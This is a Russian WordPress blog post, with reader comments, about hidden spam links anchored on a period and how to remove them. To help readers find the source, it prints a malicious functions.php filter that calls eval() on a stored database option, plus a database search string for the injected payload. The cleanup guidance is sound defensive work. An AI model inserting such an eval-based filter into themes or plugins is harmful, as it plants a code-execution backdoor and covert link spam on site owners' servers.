» » » Ссылки в точке. Находим и удаляем внешние ссылки из статей с анкором в виде точки
logotip

Ссылки в точке. Находим и удаляем внешние ссылки из статей с анкором в виде точки

Всем привет! Сегодня на SEO-Mayak.com неожиданная тема — ссылки в точке. Почему неожиданная? Потому, что эта статья не была запланирована мной заранее, а написать я ее решил после случайного обнаружения вредоносной ссылки в теле статьи, которая не была видна «не вооруженным глазом».

Странное дело, сразу в голове не укладывается. Как такое может быть, чтобы вредоносная ссылка была всего лишь точкой в статье? Уверен, что большинство веб-мастеров даже не подозревают о возможности существования таких ссылок и просто нечего об этом не слышали, так как для меня это был «гром среди ясного неба».

До чего дошел прогресс! Уважаемые мои читатели, дабы предостеречь Вас об сей скрытой опасности, я решил написать этот пост в не очереди.

Начну с того, что мне пришло письмо от моей постоянной читательницы и хорошего друга Натальи, за что ей мое огромное спасибо! Наталья написала, что обнаружила в моей статье FTP клиент Filezilla между предложениями — «На домашнем компьютере создаем папку и как-нибудь ее называем» и «В нее мы скопируем все файлы Вашего сайта и у Вас будет «Резервная копия»,  которую надо будет периодически обновлять» —  открытую внешнею ссылку. Причем выражение — «Ссылка у Вас находится между строк» меня окончательно сбило столку.

ssylka v tochkae

Конечно я полез проверять статью и к своему удивлению ни чего не обнаружил.

Как потом выяснилось, у Натальи установлено расширение для браузера RDS bar, которое подсвечивает внешние ссылки определенным цветом.

Но воспользовавшись данным расширением я к своему даже уже не удивлению, а наверное разочарованию, снова ничего подозрительного на своем сайте  не обнаружил.

Я даже пробежался в админку блога и посмотрел статью в редакторе, но не в html режиме и не визуальном режиме,  ни чего похожего на ссылку я так и не нашел.

Потом я проверил шаблон плагином TAC, известным своей способностью находить скрытые ссылки, но опять ничего не было найдено и мой мозг тогда отказался вообще, что либо понимать.

В подтверждение своих слов, Наталья прислала мне скриншот. Вот как выглядела злополучная ссылка в моей статье на ее компьютере:

ssylki v tochkah

1. Видите зеленое пятнышко не скришоте, я его пометил стрелочкой, вот так расширение RDS bar пометило открытую внешнею ссылку.

2. Сайт, на который ведет данная ссылка.

Я понял одно — ссылка находится не между предложений, а каким-то образом зашифрована в точку. Но почему расширение RDS bar не подсвечивает внешнею ссылку в моем браузере? Отгадка нашлась быстро, стоило мне только зайти на сайт не как админ, а как обыкновенный посетитель и я наконец-то своими глазами увидел подсвеченную точку.

Но почему кода ссылки нет в html редакторе и где теперь его искать? Для того, чтобы окончательно убедиться в реальном существовании зловредной ссылки я запустил другое расширение для браузера, которое называется Firebug, очень нужный плагин для любого веб-мастера.

При наведении на выделенную точку я увидел следующее:

ssylki v tochkah

Ссылка действительно очень даже реальная и вполне внешняя. С этого момента я начну более подробно описывать все действия, которые необходимо совершить, чтобы обнаружить зашифрованную в точке ссылку.

Как обнаружить и обезвредить открытые внешние ссылки с анкором в виде точки

В первую очередь, если у вас до сих пор не установлено расширение RDS bar, то советую вам его обязательно установить.

Скачать расширение RDS bar для Google Chrome

Скачать расширение RDS bar для Mazilla Firefox

Скачать RDS bar для Opera

Самое продвинутое расширение RDS bar у браузера Mazilla Firefox, но и для других браузеров, также не лишне будет его скачать.

Запускаете данное расширение и в настройках указываете желаемый цвет, которым будут подсвечиваться все внешние ссылки на открытой станице.

Это на всякий случай, так как конечно совсем не обязательно штудировать все статьи блога вышеупомянутым расширением на предмет обнаружения внешних ссылок с «точечным» анкором, тем более, что такие ссылки находятся не во всех статьях, а расположены выборочно.

Немного покопавшись в интернете я нашел ответы на свои вопросы. Для того,чтобы вытравить противно-зловредную точку с сайта необходимо проверить файл functions.php, который находиться в папке с темой, и поискать в нем, что-то похожее на такой код:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
 global $post;
 if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
 return $co;
 } else return $content;
}

Как попадает подобный код в файлы сайта? Возможно сайт был взломан или в шаблоне изначально была прописана злокачественная функция. Можно проверить файл functions.php на время последних изменений и если Вы сами в нем ни чего не редактировали, то тогда можно будет понять,  была ли прописана данная функция недавно и значит сайт был взломан или она находилась в шаблоне с самого начала.

Еще есть возможность подхватить вирус при загрузки плагина, поэтому скачивайте плагины только с официальных сайтов.

Многие плагины такие, как плагины для закрытия внешних ссылок или плагины фотогалерей и другие, в своих функциях используют фильтры:

add_filter

Так вот, с помощью подобных фильтров, хакеры подменяют текст исходного контента на другой текст с уже встроенной ссылкой в точке. Удалять точки или менять их на другие знаки бесполезно, так как «точка» проявляется на другом участке текста.

Я свой сайт начинал делать еще на локальном сервере и без труда определил, что в свое время скачал шаблон с уже прописанной злокачественной функцией, что конечно очень обидно, так как я все равно его весь переделывал.

Если вдруг Вы обнаружите данный код в файле functions.php, то удаляйте его не задумываясь, но затем еще придется немного подчистить базу данных.

Чистим базу данных

Для того, чтобы почистить базу данных, зайдите на свой хостинг в раздел «Базы данных MySQL». В одной из таблиц базы данных функция фильтра автоматически прописывает обращение в виде такой строчки:

get_option(‘blogoption’)

Для выявления оставшегося корешка воспользуемся поиском в базе данных, куда вводим следующее:

return eval(file_get_contents

ssylki v tochkah

Поиск должен отыскать примерно следующее:

ssylki v tochkah3

Удаляем данную запись из базы данных и немного успокаиваемся, так как «точку» мы обезвредили, но я бы не советовал на этом останавливаться. Для пущей уверенности в «чистоте» сайта рекомендую воспользоваться скриптом «Ai-bolit», который можно скачать здесь.

Распаковываем скаченный архив и открываем для редактирования файл «ai-bolit.php». В строке ‘site_url‘ прописываем URL своего сайта:

ssylki v tochkah5

Закидываем файлы «ai-bolit.php», «.aignore» и «.aurlignore» в корень блога с помощью FTP клиента и в адресной строке браузера набираем:

http://ваш_сайт/ai-bolit.php?p=ваш_пароль

Пароль находить в файле «ai-bolit.php» в строке:

ssylki v tochkah6

Придется немного подождать пока скрипт создаст отчет по результатам сканирования сайта.

Конечно не каждый веб-мастер может разобраться в подобном отчете, но мне он например позволил еще раз убедиться в том, что еще есть над чем работать, но об этом уже в следующих статьях.

В заключение хотел вот что сказать.

Ни когда нельзя быть уверенным в неуязвимости наших сайтов и надо всячески заботиться об их безопасности.

Рекомендую в целях обороны установить два простых плагина, которые не требуют ни каких особых настроек, но выстраивают прочные укрепления для отражения хакерских атак.

Плагин Anti-XSS attack. Скачать его можно с официального сайта по этой ссылке. В интернете бытуют разные мнения по поводу актуальности этого плагина, но мое мнение такое — XSS-атаки еще никто не отменял. После активации плагина при входе в админку блога Вас сначала будет перебрасывать на страницу с такой ссылкой:

ssylki v tochkah8

Кликнув по ссылки вы попадете на страницу ввода логина и пароля.

Плагин Login LockDown. Скачать его можно с официального сайта здесь. Тоже очень простой плагин, который просто ограничивает число попыток неправильного ввода логина и пароля к Вашему сайту, блокируя доступ к адимнке после указанного числа неудачных попыток. После активации плагина в настройках можно ничего не менять.

Как вам статья? Советую подписаться на обновления блога.

Говорят, что мимо роликов с кошками ни кто не проходит — хочу проверить 🙂

С уважением, Виталий Кириллов

Комментарии: 96

  1. Наталья:

    Отличная статья, Виталий! Информации по такой проблеме я встречала очень мало. Сейчас вот сразу же буду заниматься проверкой своего блога на наличие посторонних ссылок, которые я не ставила. Особенно актуально для всех, кто на WpordPress ставит бесплатные шаблоны. В них часто встречается такая угроза. Попробую использовать скрипт ai-bolit, так хорошо описанный вами в применении.
    Кошечки — чудесные! 🙂 Не могу мимо пройти!

    Ответить
    • админ:

      Спасибо Наталья за высокую оценку моего скромного труда!

      Ответить
  2. Анна:

    Ну нет нам покоя! Хакеры на стенку лезут, чтобы нагадить, проехать за чужой счет. У меня это расширение стоит. Так что теперь буду бдительна.

    Ответить
    • админ:

      Анна лучше сразу проверьте, файл functions.php на наличие злокачественной функции.

      Ответить
  3. Алексей Виноградов:

    Да уж, интересненько получается, а самое обидное что плагин ТАС ничего не нашёл.
    А по поводу плагинов Anti-XSS Atack и Logn LockDown я тоже читал что они больше не актуальные, но не из-за того, что атаки отменили, а потому что новые версии WordPress якобы уже имеют встроенную защиту.
    Я запретил вход в админку по IP.

    Ответить
    • админ:

      Разумное решение, запретить вход по IP, но руководствуясь комментариями, которые оставили некоторые читатели, особенно к статье 301 редирект, я сделал вывод, что для неопытных веб-мастеров, плагины являются вполне приемлемым решением, чтобы хоть как-то защитить свой сайт. Дело в том, что они как огня боятся файла .htaccess и в плагинах видят свой спасательный круг. Что касается разных разговоров, то я так и не прочел, хоть одного внятного пояснения про актуальность плагина Anti-XSS Atack, чтобы навсегда закрыть эту тему, а если говорить про плагин Logn LockDown, то нет таких функций у движка, чтоб блокировать доступ после одного неправильного ввода пароля. Опытные же веб-мастера я думаю разберутся, как обезопасить себя от лишней головной боли. В будущем я напишу еще не одну статью про возможности файла .htaccess. Спасибо за мнение Алексей.

      Ответить
      • Алексей Виноградов:

        ещё я читал что плагин Login LockDown сильно грузит сервер. Наверное имеется ввиду при попытках подбора пароля.

        Ответить
        • админ:

          Алексей, рад Вас снова видеть на боге. В ответ на ваш коментарий приведу цитату из одно высказывания — «Проверил данный плагин на предмет нагрузки на сервер. Оказалось, что плагин совсем его не не напрягает и увеличивает время загрузки сайта всего на 0,0013 мсекунд, что является очень незначительной цифрой».

          Ответить
  4. Lada:

    Спасибо, Виталий! Сразу проверила функции. Вроде, ничего похожего нет. Надо поставить плагин. Мимо кошек не прошла)))

    Ответить
    • админ:

      Но вот если бы, каждый останавливался на кошечках и потом писал об этом в комментариях, то моя жизнь бы удалась 🙂

      Ответить
  5. Сергей:

    Похвастаться, что всё получилось не могу. Надо разбираться, что это такое и где надо искать. В компьютер слабак и большой.
    Спасибо за науку.

    Ответить
    • админ:

      Сергей, я рад, что Вы заглянули на мой блог. Если есть решение заняться ведением блога, то наверное надо набраться терпения и упорства, так как знания сами не приходят. Возможно в будущем Вы будите с улыбкой на лице читать свои давние комментарии.

      Ответить
  6. Светлана:

    Огромное спасибо за такую информацию. Я обязательно проверю сайт на наличие таких скрытых ссылок. Расширение стоит, но я мало им пользовалась. Наверное, зря.

    Ответить
    • Виталий Кириллов:

      Пожалуйста Светлана. Рад видеть Вас на своем блоге. Не забываете, что расширение подсвечивает ссылку, только если Вы находитесь на сайте на правах обычного пользователя.

      Ответить
  7. Sasha:

    Плагин ТАС, к сожалению, очень слаб. У меня откровенные внешние ссылки в футере болтаются, а он посчитал шаблон чистым. Так что смысла в нем нет никакого.

    Ответить
    • Виталий Кириллов:

      Sasha, рад снова Вас видеть на моем блоге. Позволю себе частично с Вами не согласиться. Плагин ТАС еще довольно мощный инструмент для выявления закодированных ссылок таких как «base64_decode», просто время не стоит на месте и появляются все новые хакерские «штучки», о которых еще мало кто знает.

      Ответить
      • Sasha:

        Да, к сожалению, мне попался продвинутый автор шаблона. Ну ничего, пока посижу так, а потом подберу более подходящую площадку.

        P.S.. Заходить в гости буду регулярно), информация очень полезная. Спасибо!

        Ответить
  8. Золотарев Роман:

    Век живи и век учись. Чего только в seo не бывает.

    Ответить
    • Виталий Кириллов:

      Рад приветствовать Вас Роман у себя в гостях. Учится придется и хорошо если научишься чему-то вовремя.

      Ответить
  9. Елена Картавцева:

    Сложновато все для моего понимания — не дружу я с техникой и все тут, поэтому статью беру в закладки и буду «штудировать» не спеша.

    Ответить
    • Виталий Кириллов:

      Елена, рад видеть Вас на моем блоге. Надо стараться найти и удалить все ссылки с шаблона, а вот сами Вы это будите делать или нет — уже другой вопрос.

      Ответить
  10. Стефания:

    Виталий, Ваша статья как гром среди ясного неба!
    Ничего себе открытие для меня!
    Я запаниковала — не скрою!
    Спасибо Вам за труд, который Вы вкладываете в Вашу работу — Ваш замечательный и полезный блог!
    И за просвещение!

    Ответить
    • Виталий Кириллов:

      Спасибо Стефания! Рад снова Вас видеть на блоге.

      Ответить
  11. Al:

    Я всегда делаю записи в HTML редакторе, как впрочем и просматриваю подозрительные комментарии не о чем и которые, как говорят, не с той оперы в нем.
    Многое действительно узнал нового, и взял на заметку
    И согласен с Стефанией — у Вас замечательный и полезный блог! Взял его на заметку и под rss 😉

    Ответить
    • Виталий Кириллов:

      Уважаемый AL. Рад, что Вы заглянули на мой блог и спасибо за оценку моего скромного труда, но в следующий раз указывайте URL сайта более точно, чтоб не создавать битых ссылок.

      Ответить
  12. Людмила:

    Интересная и полезная статья, узнала много нового для себя, спасибо.

    Ответить
  13. Роза:

    Спасибо за полезную информацию. Много читала сео-блоков и про Вордпресс, но про ссылки-точки впервые слышу. Возьму на заметку, пока сложновато все понять. С кодами у меня туго. А расширение для Mazilla Firefox у меня давно стоит. Постараюсь проверить все. Тем более, что шаблон бесплатный стоит.

    Ответить
  14. Татьяна:

    Здравствуйте,Виталий! У Вас отличный блог! Нужная и полезная информация, особенно для начинающих вебмастеров. Все подробно и понятно описано, никакой воды и заумных фраз. Спасибо за Вашу работу.
    Тема действительно неожиданная,пойду проверять свой сайт.
    А кошки милые…а еще белёная печка и птичий гомон как звуковой фон, что-то такое деревенское, умиротворяющее.

    Ответить
    • Виталий Кириллов:

      Татьяна, рад видеть Вас на блоге и спасибо за оценку моего скромного труда.

      Ответить
  15. Ольга:

    Отличная статья, очень полезная! Но я пока не буду заморачиваться — нет ни времени, ни достаточных знаний. Один плагин у меня установлен, а вот второй надо бы установить. Спасибо за советы!

    Ответить
    • Виталий Кириллов:

      Спасибо Ольга! Рад видеть Вас на блоге.

      Ответить
  16. ladybloger:

    RDS bar — очень удобная штука. Давно установлен у меня, пользуюсь.
    Подписалась на Ваш блог, много чего интересного.

    А мимо кошечек прошла. ))

    Ответить
  17. Ольга:

    Очень я испугалась конечно.
    Надо срочно идти грузить расширение.
    А что это за файл, который все как огня боятся? Я вообще не поняла, о чем это.

    Ответить
    • Виталий Кириллов:

      Ольга, рад видеть вас на своем блоге! Файл, которого бояться начинающие блогеры называется .htaccess и ошибке в этом файле приводят к разным проблемам, после которых часто приходится обращаться в службу поддержки хостинг провайдера.

      Ответить
      • Ольга:

        А зачем люди в него лазят и делают ошибки? Я даже не знаю, где он у меня. Я все,что мне надо, нормально делаю и через админку.

        Ответить
  18. Виктория:

    Все как в медицине: чем сильнее антибиотики тем сложнее вирусы…Все, везде, всегда будут взламывать, воровать и копировать — это просто издержки и нужно относиться философски. Хорошо что вокруг много людей, которые делятся своим горьким опытом, как это сделал Виталий

    Ответить
    • Виталий Кириллов:

      Я считаю, что кто-то другой обязательно столкнется с похожей проблемой и также поделится ею на своем блоге. Вы правильно подметили, что это вирусы, которые постоянно мутируют.

      Ответить
  19. Светлана:

    Здравствуйте, Виталий. Очень полезная и интересная статья о скрытых ссылках. До чего дошёл прогресс, Скоро будем устанавливать ОС с невидимыми ссылками.
    Свой шаблон конструировала сама — думала всё будет чисто. А после Вашей статьи нет такой уверенности. Есть желание проверить шаблон на скрытые внешние ссылки, чем в ближайшее время и займусь. Спасибо за статью.

    Ответить
    • Виталий Кириллов:

      Светлана рад видеть Вас на бологе! Как написала одно моя читательница, чем сильнее антибиотики тем сложнее вирусы.

      Ответить
  20. Татьяна Румянцева:

    Здравствуйте всем! сначала удивилась — в точке и ссылка???? Потом почитала и АХНУЛА!!!! вот как бывает!. У меня стоит 2-ой плагин Login LockDown — поставила его при установке сайта. Проверки о которых вы говорите это несколько мудрено для новичка, но инфа. очень ценная. Немного подрасту и тоже буду это делать.
    Спасибо. С ув.Т.С

    Ответить
    • Виталий Кириллов:

      Здравствуйте Татьяна! Рад видеть Вас на блоге! Надо всегда быть настороже, надеюсь у Вас неприятностей с «точками» не будет.

      Ответить
  21. Татьяна Румянцева:

    Отправила комент иииии такое ЧУДО увидела — Рыбка золотая!!!!
    Подскажите пожалуйста как и себе на сайт сделать подобную благодарность!
    Премного буду вам благодарна!!!!
    С ув. Т.С \ начинающий блоггер\

    Ответить
  22. Larisenok:

    такое я точно сама не проверну — просто физически моих мозгов не хватит, но реально могла бы рассказать всем своим про это, но даже своими словами не потяну — блин, где ты был раньше? почему я про тебя никогда не слышала? просто ты гений — ну реально гений

    Ответить
    • Виталий Кириллов:

      Спасибо Larisenok за высокую оценку моего скромного труда. Рад видеть Вас на блоге!

      Ответить
  23. Станислав:

    не могу понять, как расширение RDS bar для гугл хром работает. Я его скачал и установил, у меня появился значок в правом верхнем углу, на него нажимаю, а там вот что написано: Индекс цитирования
    Проиндексировано
    Ссылки на сайт (ещё)
    Статистика
    Наличие в каталогах
    Другие параметры
    Нигде ничего не нажимается и не ставится ни каких галочек. Как его настроить? Подскажите

    Ответить
    • Виталий Кириллов:

      Станислав, после установке расширения в правом верхнем углу браузера у Вас появится иконка. Кликните по ней правой кнопкой мыши и выберите пункт «Настройки». На открывшийся странице с настройками найдите раздел «Подсветка на страницах» и там должно быт уже все понятно.

      Ответить
  24. Людмила:

    Здравствуйте, Виталий! Спасибо за нужную статью. Да информации очень мало по этому поводу. Когда я столкнулась с такой же проблемой, не одну бессонную ночь провела, пытаясь вычистить все с сайта. Ваша статья поможет многим избежать таких проблем! Хочу поделиться своим опытом, вдруг кому пригодится. У меня ни RDS bar ни плагин TAC ничего не показывал. Просто я сама увидела эту точку в скобочках. Правильно, она видна только тогда, когда заходишь ни как админ. У меня эта ссылка была зашита в сам шаблон. Я написала в службу поддержки своего хостинга, они мне дали ссылку, где черном по белому было прописано где в каком месте в теме надо удалить фрагмент ссылки. Сами ссылки удалять бесполезно, они вновь генерируются на новых страницах. Надо удалять код ссылки, который их генерирует и зашит он в самой теме. Выявляются эти ссылки на dinwes-seo, проверяя каждую станицу сайта, а не только главную. Но не забудьте сначала очистить историю, удалив сохраненные пароли, иначе никаких ссылок вы не увидите.

    Ответить
    • Виталий Кириллов:

      Людмила я рад, что Вы заглянули на мой блог. Я как раз и описал, где находиться код, который генерирует ссылки, и как он удаляется. После проделанной процедуры у меня проблем с ссылками больше не было!

      Ответить
  25. Людмила:

    Да, я это поняла. Просто у меня был другой код и я его удаляла в админ панели сайта в файле шаблона. Еще раз спасибо за полезную информацию, ведь не знаешь когда и где еще что-нибудь цапнешь. Ведь ситуации у всех могут быть разные и коды могут быть разные. Я тоже рада, что зашла на ваш сайт — такой полезный и нужный для новичков.

    Ответить
    • Виталий Кириллов:

      Спасибо Людмила!

      Ответить
  26. Людмила Алешина:

    Кстати, Виталий, у меня тоже такая есть ссылка, только отмечена она так — / Как убрать, вроде понятно, но будут вопросы по ходу дела к Вам)))

    Ответить
    • Виталий Кириллов:

      Задавайте конечно Людмила, постараюсь помочь.

      Ответить
  27. Людмила Алешина:

    установлено расширение RDS bar давно, ссылки вижу в тёмно-коричневом цвете, вот только как их убирать из внутренних файлов? Вот, побуду у Вас на страничке, попытаюсь сама убрать из темы ссылку.

    Ответить
  28. Людмила Алешина:

    Не смогла найти эту ссылку…В темах сайта — это в консоли?

    Ответить
    • Виталий Кириллов:

      Людмила, надо внимательно просмотреть файл funtions.php и найти в не кусочек кода, который я указал в статье. Файл funtions.php находится в паке с темой блога. Если зайти через FTP клиент, то путь будет выглядеть так: public_html -> wp-content -> themes -> название Вашей темы.

      Ответить
  29. Юлия:

    Давно пользуюсь RDS-баром. Очень удобная вещь, можно проверить исходящие ссылки на разных сайтах (и на своих в том числе).

    Ответить
    • Виталий Кириллов:

      Согласен, удобное и нужное расширение.

      Ответить
  30. Наталья:

    Нашла еще один сайт с подобной бедой. Человек похоже не подозревает об этом, написал комментарий об этом. Увидит, обрадуется. Вот что странно проверка на вирусы показал, что его сайт чист.

    Ответить
    • Виталий Кириллов:

      Наталья, это не вирус, а фильтр, поэтому проверять сайт на вирусы бесполезно!

      Ответить
  31. Наталья:

    Оценка заслуженная, не надо скромничать 😉

    Ответить
    • Виталий Кириллов:

      Спасибо Наталья!

      Ответить
  32. Наталья:

    Ясно. Теперь я уверенна, что человек даже не подозревает что подцепил нехороший код со встроенным фильтром. Если проснется и напишет, я его на эту статью пришлю 😉 Пусть полечится

    Ответить
  33. Наталья:

    Виталий, а что делает Плагин Anti-XSS attack? При входе в админку меня уведомляют что хакеры пытаются… Что делает плагин, как спасает?

    Ответить
    • Виталий Кириллов:

      Вот ссылочка на описание действий плагина/

      Ответить
  34. iriszka:

    Первый раз о таком читаю, спасибо. Буду знать на будущее и проверю сайт на всякий случай!

    Ответить
  35. Андрей:

    Я могу порекомендовать хороший плагин для WP — Wordfence Security. Плагин бесплатный. Есть версия про, но я на всех сайтах использую бесплатный вариант. Очень хороший инструмент. Регулярно обновляется. Есть множество настроек и функций. Из основных могу отметить:
    1. Полное сканирование всех файлов сайта.
    2. Сравнение файлов с оригиналами. Т.е. если плагин или файлы темы были изменены (даже текстовые файлы), то Wordfence об этом сразу сообщает. Более того показывает конкретно где и что было изменено (подсвечивает).
    3. Есть встроенный файервол. Можно выставить настройки, например, блокировать айпи, если идут слишком частые обращения к сайту.
    4. Оповещает о необходимых обновлениях плагинов или самой CMS.
    5. Сканирует сайт вроде пару раз в день.

    Плагин на английском языке. Но немного попользовавшись там легко разобраться.

    Ответить
  36. Елена:

    Каждая Ваша статья, Виталий, ввергает меня в шок! Спасибо за информацию! Не думала, что столько тонкостей и сложностей!)

    Ответить
    • Виталий Кириллов:

      На самом деле Елена, сложностей и тонкостей куда больше, чем Вы себе представляете.

      Ответить
  37. Сергей:

    Вот только сегодня обнаружил у себя такую проблему, чисто случайно. После очередного комментария на блоге, стал просматривать статью и обнаружил точку-ссылку, просто провидение какое-то, как я обратил на нее внимание. А потом началось… где только не искал, но нашел не у вас, раньше решил проблему. После друг скинул ссылку на вашу статью, где более подробно описана данная проблема. Спасибо и за вашу статью.
    У меня вот только вопрос, так как я не силен в технической части. Базу данных обязательно чистить, ведь в шаблоне уже нет этого кода? НЕ очень я люблю в БД ковыряться.

    Ответить
    • Виталий Кириллов:

      Сергей, лучше почистить базу. Если сами опасаетесь, обратитесь к специалисту.

      Ответить
  38. Татьяна Задоя:

    Виталий, здравствуйте! Ссылку на Вашу статью мне прислал Искандер вместе с сообщением, что эти вредоносные ссылки он увидел на моём сайте.
    Несколько раз прочитала Вашу статью, нашла файл functions.php у себя и … обнаружила там этот зловредный код (прямо один в один). Убрала это безобразие и попыталась предпринять следующий шаг, рекомендованный Вами. К сожалению мой хостинг timeweb затеял какую-то реконструкцию, и я не только не получила доступ к нужной папке, но и письмо им не смогла отправить (что-то этот хостинг меня последнее время совсем не радует). Подожду, когда доступ появится и попробую доделать начатое. Да и хостинг видимо пора менять.

    Ответить
    • Виталий Кириллов:

      Здравствуйте Татьяна, рад видеть Вас на блоге. Приятно осознавать, что мой труд приносит кому-то пользу.

      Ответить
  39. Любовь:

    Очень рада, что оказалась на вашем сайте. Вы очень доступно объясняете. Спасибо. Вредоносный код удалила и с удовольствием обнаружила, что ссылки в точках исчезли. В базу данных пока боюсь лезть. Наберусь смелости — залезу!Можно я иногда буду вам вопросы задавать?

    Ответить
    • Виталий Кириллов:

      Здравствуйте Любовь! Я тоже рад видеть Вас на блоге! Конечно задавайте.

      Ответить
  40. Наверное это я:

    Блин, Вы о котах правильно говорили….Я 40 минут ещё после окончания ролика, переходил по ссылкам:смотрел котят…Спасибо. И за котят и за блог. Толково пишете.

    Ответить
  41. Анна Вечеря:

    Добрый день, Виталий! Делала шаблон для WordPress сама, но все равно проверила файл функций, и страницы пролистала с приложением RDS-bar, ничего подозрительного не заметила. Одна только проблема, не могу разобраться со скриптом Айболит, когда перехожу по адресу http:// ваш_сайт/ai-bolit.php?p=ваш_пароль выдает ошибку 404. из-за чего так? опять невнимательность? 🙂

    Ответить
    • Виталий Кириллов:

      Может невнимательность, а может что другое.

      Ответить
      • Анна Вечеря:

        Представляете, сегодня обновила WordPress и aibolit.php нашелся! но я конечно там мало что поняла…

        Ответить
        • Виталий Кириллов:

          Анна, там действительно сложно разобраться не специалисту.

          Ответить
  42. Марина Ге:

    Здравствуйте, Виталий! Очень рада, что попала к Вам «в гости» 🙂 Видимо, придется здесь «пожить» подольше, чтобы прочитать все меня интересующее… RDS bar — вещь очень полезная. Недавно я вдруг с удивлением обнаружила, что на одном из блогов с каждой страницы появляется новая ссылка. Найти источник не смогла и поменяла тему. Пока не удалила старую с хостинга, обязательно поищу показанный Вами кусочек кода… Желательно с этим разобраться. Благодарю за ценную информацию!

    Ответить
    • Виталий Кириллов:

      Здравствуйте Марина, рад видеть Вас на блоге! Уверен, что любую проблему можно решить, если будут вопросы, я буду рад помочь.

      Ответить
  43. Иван:

    Доброго времени суток! У меня такой вопрос: после того как этот вредоносный код, проставляющий ссылки в точка, был удалён, эти ссылки, которые были им проставлены ранее пропадают или их всё равно надо искать и удалять вручную?

    Ответить
    • Виталий Кириллов:

      Здравствуйте Иван! Нет в ручную ничего удалять не надо!

      Ответить
  44. Сергей:

    Проверил всё по инструкциям и на одном из сайтов своих обнаружил злополучный код. Так что спасибо за науку!

    Ответить
  45. Пиполанка:

    Может, кому-то пригодится моя эпопея. Скачала расширение RDS bar для Гугл Хром, установила, и показал он у меня пять внешних ссылок. Я переполошилась, начала их искать, это оказались ссылки на Вордпресс.орг, их форум, еще две подобные и подарок от СЕО-плагина в «обновить до про-версии».
    Начала через консоль управления перебирать файлы: футер, хедер, сайдбар. Потом дошло до жирафа посмотреть в интернете: «внешние ссылки в adminbar» (узнала, что это он, через div id), обнаружила, что все они висят в верхней панели, которая видна только мне. Убрала ее — ссылки исчезли. Поставила обратно и открыла окно инкогнито — ссылок нет.
    Я так понимаю, поисковики не могут зайти в админ-панель, и эти внешние ссылки они не увидят. Но почему тогда я ставлю в RDS bar «разрешить использование в режиме инкогнито», и он в этом самом инкогнито показывает пять внешних ссылок при галочке в пункте профиля консоли управления «показывать верхнюю панель», если через CTRL-U я их найти не могу. Вот такая вот задачка от RDS bar для новичков, а я на всякий случай верхнюю панельку убрала.

    Ответить
    • Виталий Кириллов:

      Вы зря беспокоитесь, поисковые роботы не знают пароль от Вашей админки и следовательно не могут видеть данные ссылки.

      Ответить
  46. Иван:

    Статья хорошая, а разве ссылка в точке приносит какую-либо пользу тем кто ее разместил?

    Ответить
    • Виталий Кириллов:

      Злоумышленник получает открытую ссылку на свой сайт, которая будет проиндексированна поисковыми системами.

      Ответить
      • Иван:

        Виталий может подскажите,
        допустим мою ссылку разместил КАКОЙ-ТО сайт с очень большим ТИЦем. Чтобы у моего сайта поднимался ТИЦ достаточно одной ссылки с этого КАКОГО-ТО сайта на мой сайт, или чем больше ссылок с одного домена, тем лучше?

        Ответить
        • Виталий Кириллов:

          Большой ТИЦ — это какой?) Ссылки желательны с разных доменов.

          Ответить
          • Иван:

            Ну к примеру ТИЦ 5000 и выше. (ну для меня он большой) )))То есть по одной ссылке достаточно с разных доменов? Или нужно несколько ссылок с разных доменов?

            Ответить
            • Виталий Кириллов:

              ТИЦ 5000 конечно неплохо. Ссылок с одного домена конечно можно проставить сколько угодно, но их эффективность будет низкой. Как я уже говорил, лучше делать ссылки с разных доменов.

              Ответить
  47. Сергей:

    А нет он-лайн сервисов, чтобы определить наличие исходящих ссылок?

    Ответить
    • Виталий Кириллов:

      Вот один из многих: linkpad.ru.

      Ответить
  48. Александр:

    Статья классная, да и тема все еще актуальна. У меня тоже похожий случай был, скачал бесплатный шаблон с ненужным кодом, правда пока чистил его, несколько внешних ссылок уже проиндексировались поисковой системой Бинг. Но все же я удалил все. А про Ai-bolit это да…, вещь нужная и проверяет хорошо. Можно еще проверить на вирусы вот здесь antivirus-alarm.ru, тоже будет полезно.

    Ответить

Оставить комментарий

Внимание комментатор! Прежде чем вставить: HTML, JavaScript или PHP код в свой комментарий, преобразуй его в html сущность!

Subscribe without commenting

» Подписаться на комментарии по RSS